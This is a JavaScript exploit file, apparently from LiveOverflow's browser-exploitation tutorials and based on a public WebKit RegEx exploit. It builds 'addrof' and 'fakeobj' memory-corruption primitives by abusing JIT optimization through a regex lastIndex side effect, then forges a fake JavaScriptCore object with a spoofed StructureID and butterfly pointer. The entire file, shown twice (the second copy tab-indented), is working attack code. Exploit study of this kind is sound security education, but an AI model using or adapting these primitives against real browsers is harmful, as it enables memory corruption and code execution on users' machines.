LiveOverflow/test.js

## test.js
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

// addrof primitive
function addrof(val) {
    var array = [13.37];
    var reg = /abc/y;

    // Target function
    var AddrGetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        return array[0];
    }

    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrGetter(array);

    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = val;
        return "0";
    };
    reg.lastIndex = regexLastIndex;

    // Do it!
    return AddrGetter(array);
}

// fakeobj primitive
function fakeobj(dbl) {
    var array = [13.37];
    var reg = /abc/y;

    // Target function
    var AddrSetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        array[0] = dbl;
    }

    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrSetter(array);

    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = {};
        return "0";
    };
    reg.lastIndex = regexLastIndex;

    // Do it!
    AddrSetter(array);
    return array[0];
}

for(var i=0; i<0x2000; i++) {
    test = []
    test.x = 1
    test['prop_'+i] = 2
}

buf = new ArrayBuffer(8);
u32 = new Uint32Array(buf);
f64 = new Float64Array(buf);

fake = {}
//fake.a = 7.082855106403439e-304
u32[0] = 0x00001000 // StructureID
u32[1] = 0x01082103 // JSCellHeader flags
fake.a = f64[0]
u32[0] = 0x41414141 // butterfly
u32[1] = 0x42424242
fake.b = f64[0]
fake.c = 1337

fake_adr = addrof(fake)
f64[0] = fake_adr
u32[0] += 0x10 // shift address forward by 16 bytes
hax_addr = f64[0]
hax = fakeobj(hax_addr)
print(hax.length)
	// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
	// tutorial: https://liveoverflow.com/tag/browser-exploitation/
	// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

	// addrof primitive
	function addrof(val) {
	var array = [13.37];
	var reg = /abc/y;

	// Target function
	var AddrGetter = function(array) {
	//reg[Symbol.match]();
	"abc".match(reg);
	return array[0];
	}

	// Force optimization
	for (var i = 0; i < 10000; ++i)
	AddrGetter(array);

	// Setup haxx
	regexLastIndex = {};
	regexLastIndex.toString = function() {
	array[0] = val;
	return "0";
	};
	reg.lastIndex = regexLastIndex;

	// Do it!
	return AddrGetter(array);
	}

	// fakeobj primitive
	function fakeobj(dbl) {
	var array = [13.37];
	var reg = /abc/y;

	// Target function
	var AddrSetter = function(array) {
	//reg[Symbol.match]();
	"abc".match(reg);
	array[0] = dbl;
	}

	// Force optimization
	for (var i = 0; i < 10000; ++i)
	AddrSetter(array);

	// Setup haxx
	regexLastIndex = {};
	regexLastIndex.toString = function() {
	array[0] = {};
	return "0";
	};
	reg.lastIndex = regexLastIndex;

	// Do it!
	AddrSetter(array);
	return array[0];
	}

	for(var i=0; i<0x2000; i++) {
	test = []
	test.x = 1
	test['prop_'+i] = 2
	}

	buf = new ArrayBuffer(8);
	u32 = new Uint32Array(buf);
	f64 = new Float64Array(buf);

	fake = {}
	//fake.a = 7.082855106403439e-304
	u32[0] = 0x00001000 // StructureID
	u32[1] = 0x01082103 // JSCellHeader flags
	fake.a = f64[0]
	u32[0] = 0x41414141 // butterfly
	u32[1] = 0x42424242
	fake.b = f64[0]
	fake.c = 1337

	fake_adr = addrof(fake)
	f64[0] = fake_adr
	u32[0] += 0x10 // shift address forward by 16 bytes
	hax_addr = f64[0]
	hax = fakeobj(hax_addr)
	print(hax.length)